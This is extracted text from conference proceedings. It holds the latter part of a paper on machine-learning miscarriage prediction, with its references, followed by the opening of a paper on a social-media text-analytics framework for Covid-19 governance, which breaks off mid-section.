Asri et al. [5] designed a framework for continuous monitoring where the unsu-
pervised ML algorithm K-means clustering was used in Apache Spark. The algo-
rithm takes in the data input received through the mobile application and sensors
and predicts the risk of miscarriage based on them. The execution time should be
A Miscarriage Prevention System Using Machine Learning Techniques 425

fast with the highest classification accuracy. The drawback is that the model used
for giving the highest result does not provide much accuracy. Also, the data used is
highly biased by one particular age group.
Srinivasa et al. [6] presented four critical machine learning and deep learning
techniques in a theoretical manner to assist the gynecologists in improved treatment
of infertile women. They performed machine learning on the past infertility data and
then updated the deep learning process. However, the approach did not address the
practicality for the same in the study.
In [7], the authors conducted a survey study on 293 pregnant women attending an
early pregnancy assessment unit (EPAU). They designed the questionnaire based on
the literature review, also considering data from validated psychometric tests. They
used logistic regression to find the probability of miscarriage for all the independent
variables. The study found significant associative results but used no other algorithm
to validate the accuracy.
Koivu et al. [8] constructed classifiers using logistic regression, artificial neural
network, and gradient boosting decision trees on a CDC dataset with almost sixteen
million records. They further used the NYC dataset for evaluating the predictive
models created using the former dataset. Using the SELU network, they predicted
the early stillbirth. However, this network restricts to improvements within four
layers. They can improve the prediction performance by balancing the classes in the
data.
To stratify pregnancies with a high risk of stillbirth in [9], the authors developed a
set of different models to predict stillbirth. They did this using five machine learning
algorithms for binary classification, namely regularized logistic regression, decision
trees based on classification and regression trees (CART), random forest, extreme
gradient boosting, and a multilayer perceptron neural network. They validated the
method using the stratified K-folds technique. Although extreme gradient boosting
achieves the highest accuracy, the predictors’ accuracy varies throughout the gesta-
tional period. The exact timing for the predictors used was unavailable, and all risk
factors are unknown at a given point in time.
In [10], the authors developed a machine learning model using the extreme
gradient boosting algorithm to predict the presence of gestational diabetes mellitus
(GDM) in 19,331 women during their early pregnancy stage. They compared this
algorithm’s performance with a logistic model, which underperformed here. We do
not see any other algorithm for comparison, and hence, it will be unreliable to term
the model as the optimal one for the desired purpose.
The authors applied the C4.5 decision tree algorithm in [11] on the pregnancy
data in two ways: standardized and unstandardized. The classification performance
was better in standardized data with better accuracy and less error. The study was
limited to one algorithm for pregnancy-based classification.
A K-means clustering approach was applied in [12] on a controlled trial of preg-
nant women during the first trimester of pregnancy to analyze the presence of
hypothyroidism and the associated risk factors. As a result, the authors identified
three distinct clusters. Also, cluster analysis took into account the heterogeneity in
426 S. Biswas and S. Shukla

the study. But this analytical study lacked generalization, and the authors need to
consider a larger sample for validating the achieved associations.
Chang et al. [13] used the self-organizing map (SOM) technique and K-Modes
to generate co-morbidity-based clusters. Clusters were identified and validated for
diabetes mellitus and pregnancy cases ranging from standard to preterm birth. SOM
technique quickly and accurately identified cluster structures compared to the K-
Modes method. However, no domain expert validated the results, and therefore, we
cannot extend the results to clinical significance.
M. Tahir et al. [14] designed a neural network to classify preeclampsia based on
a dataset having 17 parameters. After considering the previous PE case history, the
algorithm was applied once, excluding the same. Accuracy decreased significantly
when the model did not use the last PE case. Neural network resulted in more accurate
classification than other algorithms, namely Naive Bayes, K-nearest neighbors, linear
regression, logistic regression, and support vector machine. Accuracy can increase
using feature selection methods.
Andriani et al. [15] developed an automatic classification algorithm to detect
blighted ovum’s presence on the ultrasound image, using CNN. Detection of a
blighted ovum in the early stage can save the underdeveloped fetus. The model
trained the images using the Keras library in Python. The accuracy of detection was
less than 60%, which can improve by using more inputs for training and adding one
pre-processing stage to make it easy to differentiate for data input with high similarity
levels.
An expert system using artificial neural network and backpropagation algorithm
was proposed by Malyawati et al. [16] for early prediction of critical pregnancy.
Using 17 input parameters and five output classes, an accuracy of 78.248% was
achieved. All the symptoms considered formed a single pattern. The system used
various ratios for training and testing data. The small size of the input data may have
resulted in a compromise in the system’s accuracy.
In [17], the authors developed a multilayer neural network using 308 features of
multi-dimensional pre-pregnancy data, resulting in an accuracy of 89.2%. They did
this to detect and classify the critical pregnancy outcomes into six prominent labels.
The study limited the proposed framework’s comparison, with only two existing
algorithms: a five-layer fully connected neural network and a decision tree.
Krisnanik et al. [18] developed a pregnancy risk detections system (PRDS) to
detect the risk level of pregnancy based on the symptom(s) experienced by the preg-
nant woman. They did this through an observational study using the descriptive,
predictive, and prescriptive data analysis approach. The study provided a particular
recommendation of improvement to reduce pregnant women’s mortality rate with
higher risk levels during this period. However, the authors did not incorporate any
validation strategy and conducted the study on a very small sample.
In [19], the authors proposed a nature-inspired algorithm called particle swarm
optimization (PSO) to reduce the cost of multilayer perceptron (MLP). This technique
was better in precision and price for the clinical decision support systems (CDSSs)
A Miscarriage Prevention System Using Machine Learning Techniques 427

used for pregnancy care. The study found the PSO algorithm to have early conver-
gence. Hence, this failed to be the best method for optimizing other ANN-based
techniques’ parameters.
Shafi et al. [20] presented some machine learning algorithms, namely random
forest, K-nearest neighbor, decision tree, support vector machine, and multilayer
perceptron, to propose a cleft prevention solution in the mother’s womb. Cleft is a
gap in the upper lip and the baby’s mouth roof during development in the uterus.
Multilayer perceptron, being a deep neural network, gave more accurate results. But
the data inputs for the prediction are comparatively less.
Moreira et al. [21] did a performance-based comparative study of the Bayes-based
machine learning techniques to determine the optimal algorithm for the classification
of hypertensive disorders during pregnancy. They did this using the cross-validation
method. The study’s scope did not extend to incorporating other machine learning
classification techniques.
In [22], the authors used the Naïve Bayes method for the Intra-Uterine Growth
Restriction (IUGR) diagnosis in pregnancy. The presence of IUGR indicates the
fetus to grow smaller than the expected standard size, thus, affecting the safety of the
woman and the fetus. Hence, we can apply this study to detect such abnormalities in
pregnant women. However, using one model has limited the scope of the study.
Tayal et al. [23] compared the efficiency of different data mining techniques and
identified decision tree as the most efficient algorithm in accuracy and specificity. The
study explored pregnancy health and new-born health issues but found no concrete
solution regarding a topic.
In [24], the authors proposed a Gaussian Naïve Bayes model to identify the risk
of abortion in pregnancy and reduce fetal mortality. They considered variables for
this purpose. The accuracy obtained was 96% for the balanced dataset. The model
is not embedded to provide useful results for medical experts.
In [25], the authors tried to make an early prediction of preterm delivery using
EHG recordings for a particular gestation period. Random forest classifier combined
with ADASYN provided an accuracy of 99.23%. This approach could predict the
classification for shorter EHG recordings, but the study did not explore the results’
robustness and validation.

3 Methodology

In this study, three machine learning algorithms, namely K-Nearest Neighbor,


Logistic Regression, and Random Forest, classify the data into two categories. Hence,
this is a binary classification problem (Fig. 1).
428 S. Biswas and S. Shukla

3.1 Data Collection

The dataset used for miscarriage detection has been taken from the GitHub reposi-
tory. It was downloaded in a comma-separated value file and loaded in the Python
environment. Previously, Asri et al. [26] collected the primary data using a mobile
phone application and healthcare sensors.
The dataset has ten lakh records and ten attributes of interest: unique record
ID, maternal age, body mass index, number of previous miscarriages, physical
activity, location, body temperature, heart rate variability, stress, and blood pres-
sure. The target variable has two labels: 1 and 0, which denote the occurrence and
non-occurrence of miscarriage, respectively.

3.2 Data Pre-processing

The dataset has no missing values, verified using the Pandas library in Python. The
variables in the dataset are continuous and categorical. While age, BMI, temper-
ature, BPM are continuous in nature, activity, location, stress, and blood pressure
are categorical variables. It is evident in Fig. 2 that age is positively correlated with
the target while BMI, temperature, BPM are negatively correlated with the target.
The intensity of physical activity and high-stress level increases the risk of miscar-
riage. While checking each attribute’s proportion, it has been found that 99.7% of
the records were of women of 25 years old. These records highly dominated the
entire dataset and created a biased classification. Hence, stratified sampling has been
performed, where a fixed value of strata is considered for all the age groups. For each
value of the age, the corresponding features were taken into account. This task has
been performed to maintain an equal proportion to balance the data and remove the
dataset’s bias. Hence, after selection, the total number of records was 1775 with ten
attributes.

3.3 Model Building and Validation

80% of the dataset has been used to train the algorithms, while 20% has been tested.
The algorithms used for model building are K-nearest neighbor (KNN), logistic
regression, and random forest.
KNN is a supervised classification algorithm and needs labeled data for training.
The test data point is predicted using KNN from the available class labels by finding
the distance between the test point and trained k-nearest feature values. This process
involves calculating the distance between the data points using distance measures
such as Euclidean distance, Manhattan distance, Hamming distance, and Minkowski
distance. The main steps for KNN are as follows: to check the data and calculate
A Miscarriage Prevention System Using Machine Learning Techniques 429

Fig. 1 Process diagram of the study

Fig. 2 Correlation of the attributes considered for the study

the lengths, find the closest neighbors, label the data point, and vote for the labels.
For choosing K’s optimal value, a plot is derived between error rate and K denoting
values in a defined range. Then, the K value having a minimum error rate is chosen.
Logistic regression is a supervised algorithm used to divide the dataset into classes
by estimating the probabilities using a sigmoid/logistic function. The aim is to find
the best fitting model to describe the relationship between the binary dependent
variable and a set of independent variables. There are some assumptions in logistic
regression which include the following:
430 S. Biswas and S. Shukla

• For binary logistic regression, the dependent variable needs to be binary. The first
level of the dependent variable factor should also represent the desired outcome.
• The model should have negligible or no multicollinearity.
• Logistic regression needs a large sample size.
Random forest is a supervised algorithm used for both classification and regres-
sion. Its use as a classification technique has been focused on in this work. Multiple
decision trees construct a random forest. It is preferred over a single decision tree as
it uses an ensemble learning approach by taking an average of the result and reducing
the overfitting. The steps involved in random forest are a selection of random samples,
construction of a decision tree for every sample to obtain the individual prediction,
voting for the predicted result, and the section of the voted result with the highest
frequency as the final prediction result.
The model validation has been performed using the K-fold cross-validation tech-
nique, where K’s value is taken as 10. The performance metrics used here are the
confusion matrix, accuracy, precision, recall, F1 score, AUC score, and ROC curve.

4 Experimental Results and Discussion

The accuracy obtained for K-Nearest Neighbor, Logistic Regression, and Random
Forest is 95, 97, and 97%, respectively. Therefore, it can be concluded that random
forest can, 97% of the time, correctly predict whether the woman will have a
miscarriage or not.
The precision is 100% for all three models for women labeled to have no miscar-
riage. For logistic regression and random forest, the precision obtained is 95% for
women labeled to have a miscarriage. For K-nearest neighbor, the precision obtained
is 94% for women labeled to have a miscarriage.
In all the three models, the recall obtained is 94% for women labeled to have no
miscarriage. The recall obtained is 100% for women labeled to have a miscarriage
in all three models.
In all three models, the F1 score obtained is 97% for both women labeled to have
a miscarriage and no miscarriage.
From the ROC curve obtained as shown in Fig. 3, it is evident that all three models
have high separability power, which means that they have high chances of accurately
classifying a new case. As the ROC curve for random forest and logistic regression is
slightly above that of K-nearest neighbor, the chances of classification are somewhat
better for them.
Therefore, all the three techniques considered for the classification here have high
accuracy. However, random forest and logistic regression show greater accuracy than
KNN. Random forest is recommended for application in practical situations as it is
based on ensemble learning, prevents overfitting, and has useful functionality.
A Miscarriage Prevention System Using Machine Learning Techniques 431

Fig. 3 ROC curve for the ML models

5 Conclusion

This work highlights the various machine learning classification models constructed
to predict miscarriage during pregnancy’s early stages. A comparative analysis is
done to check the constructed model’s performance using some standard evalua-
tion metrics. It will be beneficial for the patient and the concerned experts to take
the necessary precautions to prevent miscarriage. Primary data collection was not
possible from the healthcare centers due to the COVID-19 scenario. The study is
limited to a few classification algorithms. We plan to extend this work by collecting
data primarily from hospital records and using other classification and regression
techniques.

References

1. Magnus, M. C., Wilcox, A. J., Morken, N. H., Weinberg, C. R., & Håberg, S. E. (2019). Role
of maternal age and pregnancy history in risk of miscarriage: Prospective register based study.
BMJ (Online), 364, 1–8.
2. Bruno, V., D’Orazio, M., Ticconi, C., Abundo, P., Riccio, S., Martinelli, E., Rosato, N., Piccione,
E., Zupi, E., & Pietropolli, A. (2020). Machine learning (ML) based-method applied in recurrent
pregnancy loss (RPL) patients diagnostic work-up: A potential innovation in common clinical
practice. Scientific Reports, 10(1), 1–12. https://doi.org/10.1038/s41598-020-64512-4
3. Liu, L., Jiao, Y., Li, X., Ouyang, Y., & Shi, D. (2020). Machine learning algorithms to predict
early pregnancy loss after in vitro fertilization-embryo transfer with fetal heart rate as a strong
predictor. Computer Methods and Programs in Biomedicine, 196, 105624.https://doi.org/10.
1016/j.cmpb.2020.105624
432 S. Biswas and S. Shukla

4. Pruthi, J. (2018). A walkthrough of prediction for pregnancy complications using machine


learning: A retrospective. In 4th International Conference on Computers and Management
(ICCM) (pp. 338–343).
5. Asri, H., Mousannif, H., & Moatassime, H. A. (2017). Real-time miscarriage prediction
with SPARK. Procedia Computer Science, 113, 423–428. https://doi.org/10.1016/j.procs.2017.
08.272
6. Srinivasa Rao, A. S. R., & Diamond, M. P. (2020). Deep learning of Markov model-
based machines for determination of better treatment option decisions for infertile women.
Reproductive Sciences, 27(2), 763–770. https://doi.org/10.1007/s43032-019-00082-9
7. San Lazaro Campillo, I., Meaney, S., Corcoran, P., Spillane, N., & O’Donoghue, K. (2019). Risk
factors for miscarriage among women attending an early pregnancy assessment unit (EPAU):
a prospective cohort study. Irish Journal of Medical Science, 188(3), 903–912.https://doi.org/
10.1007/s11845-018-1955-2
8. Koivu, A., & Sairanen, M. (2020). Predicting risk of stillbirth and preterm pregnancies with
machine learning. Health Information Science Systems, 8, 14. https://doi.org/10.1007/s13755-
020-00105-9
9. Malacova, E., Tippaya, S., Bailey, H. D., et al. (2020). Stillbirth risk prediction using machine
learning for a large cohort of births from Western Australia, 1980–2015. Science and Reports,
10, 5354. https://doi.org/10.1038/s41598-020-62210-9
10. Liu, H., Li, J., Leng, J., Wang, H., Liu, J., Li, W., Liu, H., Wang, S., Ma, J., Chan, J. C. N., Yu,
Z., Hu, G., Li, C., & Yang, X. (2020, February). Machine learning risk score for prediction of
gestational diabetes in early pregnancy in Tianjin, China. Diabetes/Metabolism Research and
Reviews. https://doi.org/10.1002/dmrr.3397
11. Lakshmi, B. N., Indumathi, T. S., & Ravi, N. (2016). A study on C.5 decision tree classification
algorithm for risk predictions during pregnancy. Procedia Technology, 24, 1542–1549. https://
doi.org/10.1016/j.protcy.2016.05.128
12. Gárate-Escamilla, A. K., Garza-Padilla, E., Carvajal Rivera, A., Salas-Castro, C., Andrès, E., &
Hajjam El Hassani, A. (2020). Cluster analysis: A new approach for identification of underlying
risk factors and demographic features of first trimester pregnancy women. Journal of Clinical
Medicine, 9(7), 2247. https://doi.org/10.3390/jcm9072247
13. Chang, J., & Sarkar, I. N. (2019). Using unsupervised clustering to identify pregnancy co-
morbidities. In AMIA Joint Summits on Translational Science Proceedings. AMIA Joint Summits
on Translational Science, no. 1 (pp. 305–314).
14. Tahir, M., Badriyah, T., & Syarif, I. (2018). Neural networks algorithm to inquire previous
preeclampsia factors in women with chronic hypertension during pregnancy in childbirth
process. In 2018 International Electronics Symposium on Knowledge Creation and Intelligent
Computing (IES-KCIC) (pp. 51–55). Bali, Indonesia. https://doi.org/10.1109/KCIC.2018.862
8588
15. Andriani, F., & Mardhiyah, I. (2019, March). Blighted ovum detection using convolutional
neural network. In AIP Conference Proceedings, 2084. https://doi.org/10.1063/1.5094276
16. Maylawati, D. S. A., Ramdhani, M. A., Zulfikar, W. B., Taufik, I., & Darmalaksana, W. (2017).
Expert system for predicting the early pregnancy with disorders using artificial neural network.
In 2017 5th International Conference on Cyber and IT Service Management, CITSM 2017.
https://doi.org/10.1109/CITSM.2017.8089243
17. Mu, Y., Feng, K., Yang, Y., & Wang, J. (2018). Applying deep learning for adverse pregnancy
outcome detection with pre-pregnancy health data. MATEC Web of Conferences, 189.https://
doi.org/10.1051/matecconf/201818910014
18. Krisnanik, E., Tambunan, K., & Irmanda, H. N. (2019). Analysis of pregnancy risk factors
for pregnant women using analysis data based on expert system. In Proceedings—1st Interna-
tional Conference on Informatics, Multimedia, Cyber and Information System, ICIMCIS 2019
(pp. 151–156). https://doi.org/10.1109/ICIMCIS48181.2019.8985211
19. Moreira, M. W. L., Rodrigues, J. J. P. C., Kumar, N., Al-Muhtadi, J., & Korotaev, V. (2018).
Nature-inspired algorithm for training multilayer perceptron networks in e-health environments
for high-risk pregnancy care. Journal of Medical Systems, 42(3). https://doi.org/10.1007/s10
916-017-0887-0
A Miscarriage Prevention System Using Machine Learning Techniques 433

20. Shafi, N., Bukhari, F., Iqbal, W., Almustafa, K. M., Asif, M., & Nawaz, Z. (2020). Cleft
prediction before birth using deep neural network. Health Informatics Journal, 54590. Available
at https://doi.org/10.1177/1460458220911789
21. Moreira, M. W. L., Rodrigues, J. J. P. C., Carvalho, F. H. C., Chilamkurti, N., Al-Muhtadi, J.,
& Denisov, V. (2019). Biomedical data analytics in mobile-health environments for high-risk
pregnancy outcome prediction. Journal of Ambient Intelligence and Humanized Computing,
10(10), 4121–4134. https://doi.org/10.1007/s12652-019-01230-4
22. Badriyah, T., Savitri, N. A., Sa’adah, U., & Syarif, I. (2020). Application of naive bayes method
for IUGR (Intra Uterine Growth Restriction) diagnosis on the pregnancy. In 2020 International
Conference on Electrical, Communication, and Computer Engineering (ICECCE) (pp. 1–4).
Istanbul, Turkey. https://doi.org/10.1109/ICECCE49384.2020.9179256
23. Tayal, D. K., Meena, K., Pragya, & Kumar, S. (2018). Analysis of various data mining tech-
niques for pregnancy related issues and postnatal health of infant using machine learning and
fuzzy logic. In 2018 3rd International Conference on Communication and Electronics Systems
(ICCES) (pp. 789–793). Coimbatore, India. https://doi.org/10.1109/CESYS.2018.8724082
24. Campero-jurado, I., Robles-camarillo, D., & Simancas-acevedo, E. (2020). Problems in
pregnancy, modeling fetal mortality through the Naïve Bayes classifier. 11(3), 121–129.
25. Despotović, D., Zec, A., Mladenović, K., Radin, N., & Turukalo, T. L. (2018). A machine
learning approach for an early prediction of preterm delivery. In 2018 IEEE 16th International
Symposium on Intelligent Systems and Informatics (SISY ) (pp. 000265-000270). Subotica.
https://doi.org/10.1109/SISY.2018.8524818
26. Asri, H., Mousannif, H., & Al Moatassime, H. (2018). Comprehensive miscarriage dataset for
an early miscarriage prediction. Data in Brief, 19, 240–243. https://doi.org/10.1016/j.dib.2018.
05.012
Efficacious Governance During
Pandemics Like Covid-19 Using
Intelligent Decision Support Framework
for User Generated Content

Rajni Jindal and Anshu Malhotra

Abstract During the unprecedented global health emergency caused by the pan-
demic Covid-19, the governments and nationalized organizations of all countries
are struggling to control its spread by enforcing various measures, and also manage
its social economic impact through policy intervention. In such critical situation, it
becomes imperative to take data driven decisions. User generated content over online
social media is an untapped data source that can be leveraged to gain insights for
effective governance and decision making; and can also serve as a first hand commu-
nication medium between the various government bodies and citizens. In this paper,
we have proposed a novel governance framework that leverages user generated con-
tent on social media for effective decision making by the authorities. We have used
topic modelling techniques to discover social-economic trends, and to understand
the issues or concerns of public interest. We used information extraction techniques
like noun and verb phrase extraction, and Named Entity Recognition to measure
the geographical spread, identify Covid-19 hotspots, assist in contact tracing, and
discovering new health conditions. From the available literature, we could not find
any intelligent framework for effective governance during pandemics, where user
generated content has been utilized for real time decision making. In this paper, we
address this real world problem through our proposed decision support System, and
demonstrate as a proof-of-concept of how it can be used for effective governance
during the pandemics through its prototype implementation.

Keywords Decision support · Decision making · Intelligent computing · Big data


analytics · Machine learning · Natural language processing · Covid-19 ·
Governance · Online social networks

Both authors contributed equally.

R. Jindal · A. Malhotra (B)


Delhi Technological University, Delhi, India
e-mail: rajnijindal@dce.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 435
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_35
436 R. Jindal and A. Malhotra

1 Introduction

The world today is witnessing unprecedented crisis situation caused by outbreak of


the novel Corona virus (SARS-Cov-2) that originated in Wuhan, China in December
2019. In March 2020, World Health Organization officially characterized the wildfire
like global spread of this Covid-19 respiratory disease as the first ever pandemic
caused by a coronavirus.1 WHO advised governments of all nations to find innovative
ways for preventing its spread and protecting their citizens; and reiterated the need
for effective leadership and preparedness on public health frontier. One year down
the line, the governments of all nations across the globe are still grappling to control
its spread, minimize the death toll and manage the social economic collapse caused
by the pandemic. These are tough and unforeseen times for the governments and no
playbook is available for them to guide them about measures and policies needed,
their effectiveness and acceptance by people, their short-term and long-term impact,
what strategies to adopt for vaccination, and what will it take to finally recover from
social and economic losses that the pandemic will leave behind.
In the current global health crisis scenario, inter disciplinary research becomes
indispensable and it is absolutely necessary for government bodies, health care pro-
fessionals, economists and social scientists, public nationalized institutions, health
care bodies to come together to control the pandemic, simultaneously minimizing
the collateral damage to society and economy [1]. Alamo et al. have emphasized the
need of data driven approaches for monitoring, forecasting, modelling, taking timely
decisions and measuring the effectiveness of those government measures and actions
[1].
Swapnarekha et al. in their review, research paper has also necessitated the need
of forecasting and prediction techniques for developing government strategies for
controlling the spread of pandemic [2]; whereas Bullock et al. have also highlighted
the requirement and importance of government policy attention and intervention for
effective management of the ongoing pandemic situation [3]. Our research is along
similar lines, where we propose an intelligent decision support system using machine
learning, big data analytics and natural language Processing over publicly available
user generated content on social media for efficacious governance during pandemics
like Covid-19.
Salient Research Contributions: The governments of all the nations across the
globe are grappling to contain the spread of Covid-19 pandemic, minimize the fatal-
ities and at the same time understand and manage the collateral social economic
trends and public concerns. In this paper, we have proposed an intelligent decision
support framework that is built over publicly available user generated content on
social media, for effective governance during such pandemics or any crisis situa-
tion. We use various big data and text analytics techniques, along with unsupervised
machine learning that are explained in detail in the following sections. Our proposed
automated frameworks can be quickly and easily developed and deployed by govern-

1 https://www.who.int/director-general/speeches/detail/who-director-general-s-opening-
remarks-at-the-media-briefing-on-covid-19—11-March-2020.
Efficacious Governance During Pandemics … 437

ment bodies and various other national organizations; and can assist in the following
tasks that are otherwise difficult to accomplish in real time, time bound manner even
with large human bandwidth:
• In our proposed framework, we use topic modelling techniques to discover and
predict various social and economic trends at national and regional level; and to
understand issues and public concerns. This serves as a useful input for policy
intervention and formulation to manage the collateral impact caused by the pan-
demic in all social-economic public and private sectors.
• We used unsupervised information extraction and aggregation techniques like:
Noun and verb phrase extraction, Named Entity Recognition and clustering on
user generated content from social media to measure geographical spread, identify
Covid-19 hotspots, assist in contact tracing, discovering new symptoms and health
condition indicators.
• We have done a prototype implementation of our proposed framework as a proof-
of-concept that it can serve as a decision-making tool for effective governance
during such health emergencies. This is a novel idea for governance during pan-
demics, as we could not find a similar framework from the existing literature
survey.
These are the major contributions of our proposed framework that are explained in
the subsequent sections with implementation results on a sample dataset. The related
literature survey is discussed in the following section.

2 Related Literature Survey

The scope of this section is to discuss the relevant research published in the last year
since the pandemic outbreak, where machine learning and natural language tech-
niques have been used for Covid-19 related applications and use cases, specifically
utilizing user generated content from social media. Even though some research has
been done for opinion and sentiment analysis related to Covid-19 from social media;
we did not find any research or prototype where a comprehensive framework has
been proposed or implemented for effective governance and management of social-
economic issues due to the unprecedented pandemic situation caused by the novel
Corona virus.
Oyebode et al. have analysed the sentiment polarity of Covid-19 related com-
ments from various social media by extracting opinionated key phrase and themes
using predefined POS grammar rules (context based NLP techniques). This tech-
nique helped in discovering positive and negative themes/issues related to Covid-19
across various categories (e.g. economics, education, socio-political) and understand
corresponding public perceptions [4]. Samuel et al. have performed very basic sen-
timent classification of Covid-19 related Tweets using logistic regression and Naïve
Bayes [5]; another study analysis the emotions and sentiments evoked by English
News headlines [6]. A study using NLP feature engineering techniques, trend anal-
438 R. Jindal and A. Malhotra

ysis using unsupervised clustering and topic modelling has been done on Reddit
Mental Health Support groups dataset to understand the change in anxiety levels
in people pre and during the pandemic [7]. An EBKA, i.e. evidence based knowl-
edge acquisition approach has been demonstrated to aggregate novel and trustworthy
information from social media to augment the information about events happening
in real world, in this case Covid-19 [8].
Chen et al. have extensively reviewed the datasets and systems related to NLP
techniques for biomedical research, e.g. entity recognition in medical documents, Q
& A answering for building chat bot for Covid-19, discovering medical concepts and
literature based discovery, understanding EHR (electronic health records); however,
the social media text analytics has not been covered in much detail [9].
Swapnarekha et al. have done an extensive state of the art review of the existing
machine learning and intelligent computing research that is being done for diagnosis,
classification, forecasting, prediction and prevention of Covid-19 [2]. They have pro-
vided an extensive in depth review about how different machine learning and big data
analytics techniques are being used for various use cases related to Covid-19 pan-
demic. Some of the examples are: using algorithms like random forests, XGBoost,
SVM for detection of Covid-19 from chest/lungs X-rays and CT Scans; analysing
the impact of policy measures like social distancing, wearing masks in reducing
the transmission; use of linear regression, neural networks for forecasting and trend
prediction. A similar survey has been done by Bullock et al. to map the landscape
of AI & ML based applications that have been developed for Covid-19 across three
broad categories: Molecular (e.g. protein structure prediction, drug development,
vaccine discovery etc.); Clinical (e.g. medical imaging for diagnosis, disease track-
ing and prediction) and Societal (e.g. modelling and forecasting statistics, clustering
of nations based on various factors, public policy etc.) [3]. We used this review paper
specifically to understand the state of the AI & ML applications that have been devel-
oped for societal use cases. Though most of the research has been done for modelling
and forecasting the statistics related to spread of Covid-19; some very preliminary
and basic applications have been built to leverage the online social media for under-
standing public opinion and sentiment analysis, propagation of misinformation and
hate speech, and efficacy of public policy. As we could gauge from these two review
papers, not much research has been done to leverage machine learning and intelli-
gent computing techniques coupled with publicly available data over social media
for designing effective governance measures during pandemics. This research gap is
the main focus and contribution of our research paper; since real time big data from
social media is an untapped resource and can serve as an excellent decision making
tool for government bodies and help them better understand the public issues and
concerns at state and national level.
Efficacious Governance During Pandemics … 439

3 Proposed Framework

Our novel proposed framework for effective governance during pandemics like
Covid-19 is depicted in Fig. 1 and is explained in detail in this section. Our pro-
posed governance framework consists of three main modules: (1) Text pre-processing
pipeline (2) Information extraction module (3) social-economic trend prediction
module. The idea is to have real time tools developed and deployed which monitor
the publicly available user generated content on social media, and serve as a decision
support system to give meaningful insights to various government and nationalized
bodies. Such tools and technologies can assist decision making related to governance
measures and policies required in short and long term to handle crisis situation like
we are since 2020 due to global pandemic of Covid-19.

3.1 Text Pre-processing Pipeline

This module is a mandatory precursor to any analysis or system that leverages user
generated content from various popular social media platforms; mainly because the
user generated content is non standardized, is of multimodal and multilingual nature,
contains heterogeneous platform specific information, contains noise and is error
prone. Hence before utilizing machine learning and big data and text analytics tech-
niques the following pre-processing steps become essential.
Extract Platform Specific Information: Platform specific non textual information
like geolocation tags, @ mentions, # tags, must be separated from the textual content
in the user’s posts. Even though, this information is noise for any NLP based system,

Extract user’s Geolocation, @ mentions, #tags, if available


@
Text Preprocessing Pipeline

User’s Social Media Cleaning: remove noise i.e.


Posts special characters, numbers, Tokenization,
emoticons, URLs, hashtags, Lemmatization, Chunking
mentions, stop words etc. and & POS Tagging
convert to lower case

Processed & Cleaned


User Generated Text

Entity Recognition: People, Countries / States /


Topic Modelling using LDA &
Noun Phrase Detection Verb Phrase Detection Cities, Locations, Buildings, Organizations &
GSDMM
Institutions, Objects, Events, Date etc.

Unsupervised ML for Information Aggregation


Socio-Economic Global Trends
Information Extraction Module: Prediction Module
to measure geographical spread, identify hotspots, contact tracing & discover new symptoms

Fig. 1 Proposed framework for efficacious governance during pandemics like Covid-19
440 R. Jindal and A. Malhotra

however in the scope of our current application, this information can be very useful
for contact tracing and identifying Covid-19 hotspots. Hence we extract and store the
geolocation tags, # tags, and @mentions that are used to tag people from the user’s
social media posts.
Cleaning and Noise Removal: In order to standardize the text from the user’s
social media posts and enhance the data quality of input to NLP and ML algorithms
that follow, it is essential to remove the noisy elements from texts. We pre-process the
text in the user’s posts by removing the special characters, punctuations, numerics,
emoticons, and URLs (which are very common in social media posts); the hashtags
and mentions have already been removed in the previous steps. Next, we also remove
the stop words (like a, the, and etc.) as they do not add any value w.r.t to information
extraction and trend prediction we wish to accomplish. Finally, case conversion is
done to bring uniformity as people usually are not very case conscious, while posting
on social media.
Tokenization: This is a fundamental step of any NLP pipeline in order to break or
extract meaningful tokens from the input text document, sentence or phrase. Tokens
are the logical inputs to any NLP algorithm and can be created in 3 ways: word level,
sub words level, i.e. n-grams, or character level. In our application since we aim to
infer meaningful topics, trends and entities; we perform word level tokenization to
extract the bag of words from user’s social media posts.
Lemmatization: This is the process of reducing the words from the document
vocabulary to their root word from which they are derived, in order the group together
and analyse the different inflected forms of the same base word as a single entity.
Unlike stemming, which a very crude heuristic process that chops of the affixes of a
word; lemmatization is done using proper grammatical and morphological rules and
correct identification of parts of speech. This step, reduces the dimensionality of the
documents (in our case user’s social media posts), and makes the feature matrix less
sparse.
Chunking and POS Tagging: Bag of words (tokens) approach described above
loses the meaningful information about the semantic structure and actual meaning
of the sentence. Chunking along with Part of Speech tagging, basically refers to
extracting phrases of words from the sentence to understand the logical sentence
structure. It helps to derive various constituents from unstructured text, i.e. nouns,
pronouns, adjectives, verbs, adverbs, prepositions, conjunctions and interjections.
Chunking and POS tagging are essential steps of Named Entity Recognition (NER),
which helps us extract the various constituents like names, places, events, dates etc.
from unstructured text. Additionally, for the topic modelling and thematic analysis
of user generated text, it is important to retain the logically related phrases instead
of mere individual tokens.
Efficacious Governance During Pandemics … 441

3.2 Information Extraction Module

This module of our proposed system is designed to achieve the following goals:
measure geographical spread, identify Covid-19 hotspots, and assist in contact tracing
to identify probable cases, discover new symptoms and health condition indicators
related to the ongoing pandemic disease. Unstructured textual data (user’s post)
contains a vast amount of information, all of which may not be relevant for us in the
current context. Information extraction is basically a NLP task where we retrieve the
information of interest within the context of current information need and extract
structured pieces of information from free flowing text. We may be looking for
different pieces of information like names of entities, relationship between entities, a
place, a date, sequence of events, an idea, thought or a state of being. In our research,
our goal is to extract person names, places/locations, organizations, action verbs and
state of being which will help us in measuring geographical spread of pandemic,
identifying hotspots, contact tracing and discovering new health indicators related to
the pandemic. We have used three different information extraction techniques: Noun
phrase detection, Verb phrase detection and Named Entity Recognition to accomplish
the above mentioned tasks; the methodology and techniques adopted are explained
in detail below.
Noun and Verb Phrase Detection: In any communication language, there are
eight parts of speech, that basically determine the grammatical role a word plays in
the sentence. These are: nouns, pronouns, adjectives, verbs, adverbs, prepositions,
conjunctions and interjections. In NLP domain, the task of determining and assigning
a correct part of speech tag to each word in a sentence based on the role it plays is
called POS Tagging. POS Tagging helps to understand sentence structure and build
rules to extract the relevant information of interest. We use this NLP technique to
identify the noun and verb phrases in the user’s posts which are the most informative
pieces of user posts for our research problem. Nouns, as we all know represent
people, places, things and ideas and Verbs, are actions words or words that depict
a state of being. We implement POS Tagging and built rules to extract nouns and
verb phrases. This helps ascertain the geographical spread of the pandemic based on
statistical analysis of the user posts related to Covid-19 on social media within the
region and time duration of interest. We extracted proper nouns which could be the
names of people a user may have met or places he may have visited. The location tags
